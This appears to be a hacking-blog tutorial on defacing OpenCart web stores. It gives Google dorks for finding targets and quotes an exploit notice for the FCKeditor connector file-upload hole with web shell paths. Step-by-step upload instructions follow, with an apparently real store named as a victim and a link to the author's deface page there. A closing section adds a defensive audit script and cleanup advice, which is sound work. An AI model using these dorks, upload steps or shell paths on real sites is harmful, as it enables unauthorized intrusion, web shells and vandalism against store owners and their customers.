This time I want to share an easy, simple and hassle-free way to deface a website.
I have actually had this bug down since my first year of junior high school,
and back then Google turned up a lot of websites that still had it. Nowadays?
Who knows; if you are lucky you will find one :p
OK, straight to the method.
As usual, the search goes through good old Google.
( Copy the dork into the Google search engine )
The dork:
SUPPORT BY OPENCART
or
Powered By OpenCart site:com (you can change the site part, such as my, il, etc.; what matters is that the site runs OpenCart)
If you want all of them, drop the site part so it is just Powered By OpenCart
The exploit details are:
==========================================
Opencart remote file Upload Vulnerability
==========================================
#Exploit Title: Opencart remote file uploade
#Author: Net.Edit0r
#Email: blazevbs@hackermail.com ~ Black.Hat.tm@Gmail.com
#Google dork: [inurl:Powered By OpenCart
#Software Link: http://www.opencart.com/index.php?route=download/download
#Platform :linux/php
######################################
Iranian HackerZ
######################################
# http://target.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
# Example site: http://server
# Select the "File Upload" To use = php
# http://server/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
# Sh3ll : http://server/admin/view/javascript/fckeditor/editor/filemanager/connectors/php/shell.php
# OR
# http://server/shell.php
######################################
Demo Example
######################################
Demo : http://www.site.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
##########################################
Spical Thanks To >>ALL BAMBANGLICIOUS FAMILY ~
########################################## End ##########################################
On to the method.
Once you have found a target
Example target: http://chinalacewigstore.com/store
Once you have the target, just append the exploit path:
admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
So it ends up like this: http://chinalacewigstore.com/store/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
If you find one like this: http://chinalacewigstore.com/store, append the path after /store/.
Don't forget to change the connector to PHP when uploading.
Then upload your deface file; if it succeeds, an alert appears that reads “file uploaded with no errors”.
To see whether the upload succeeded, go to “Get Folders and Files” and look at the result…
If it worked, just put the name of your deface file after the site address.
Here is an example of my deface result: http://chinalacewigstore.com/merdeka.html
Easy, right?
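For a store owner, the paths above are the ones to audit on disk. The following is an added example, not code from the original post or from OpenCart: it checks one OpenCart directory for the connector test pages, for files in the connector's php directory outside an assumed stock FCKeditor 2.x file list, and for a config.php that sets $Config['Enabled'] to true. The function names, the stock file list and the sample tree are assumptions of this example.

```python
import os
import re
import tempfile

# Directory path taken from the post; everything else is an assumption of this example.
CONNECTORS = os.path.join("admin", "view", "javascript", "fckeditor",
                          "editor", "filemanager", "connectors")
# Assumed stock file set of the FCKeditor 2.x PHP connector directory.
STOCK_PHP = {"basexml.php", "commands.php", "config.php", "connector.php",
             "io.php", "phpcompat.php", "upload.php", "util.php"}
ENABLED_RE = re.compile(r"^\s*\$Config\[\s*'Enabled'\s*\]\s*=\s*true\b", re.I | re.M)

def audit_store(store_root):
    """Return a sorted list of (finding, path) for one OpenCart directory."""
    findings = []
    base = os.path.join(store_root, CONNECTORS)
    if not os.path.isdir(base):
        return findings
    # Test pages that expose the file manager's upload form.
    for name in ("test.html", "uploadtest.html"):
        path = os.path.join(base, name)
        if os.path.isfile(path):
            findings.append(("connector-test-page", path))
    php_dir = os.path.join(base, "php")
    if os.path.isdir(php_dir):
        # Anything beyond the stock connector files deserves a manual look.
        for name in sorted(os.listdir(php_dir)):
            path = os.path.join(php_dir, name)
            if os.path.isfile(path) and name not in STOCK_PHP:
                findings.append(("unexpected-file", path))
        config = os.path.join(php_dir, "config.php")
        if os.path.isfile(config):
            with open(config, encoding="utf-8", errors="replace") as fh:
                if ENABLED_RE.search(fh.read()):
                    findings.append(("connector-enabled", config))
    return sorted(findings)

def build_sample(root):
    """Constructed sample tree holding the leftover files the post describes."""
    php_dir = os.path.join(root, CONNECTORS, "php")
    os.makedirs(php_dir)
    open(os.path.join(root, CONNECTORS, "test.html"), "w").close()
    open(os.path.join(php_dir, "shell.php"), "w").close()
    with open(os.path.join(php_dir, "config.php"), "w") as fh:
        fh.write("<?php\n$Config['Enabled'] = true ;\n")
    return root

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for kind, path in audit_store(build_sample(tmp)):
            print(kind, os.path.relpath(path, tmp))
```

Any finding is a reason to delete the test pages, disable or remove the connector, and review the web root for files you did not put there.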